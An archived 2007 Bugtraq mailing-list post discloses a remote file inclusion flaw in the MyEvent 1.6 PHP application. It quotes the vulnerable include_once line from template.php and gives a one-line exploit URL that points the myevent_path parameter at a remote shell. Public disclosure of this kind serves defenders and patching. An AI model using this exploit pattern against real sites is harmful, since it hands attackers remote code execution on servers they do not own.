[<prev] [next>] [thread-next>] [month] [year] [list]
Date: 2 Jun 2007 07:07:53 -0000
From: yaser@...cturk.net
To: bugtraq@...urityfocus.com
Subject: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
#########################################################################
#
# MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
#
# Author: Yaser <yaser@...cturk.net>
#
# Homepage: http://www.ayyildiz.org
#
#########################################################################
#########################################################################
# Download S : http://mywebland.com/download.php?id=6
#
# ERROR:
#
# include_once($myevent_path.'includes/template.php')
#
# Exploit:
# http://[site]/[PaTh]/includes/template.php?myevent_path=[shell]
#
#########################################################################
Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker
Hosted by DataForce ISP -
Powered by Openwall GNU/*/Linux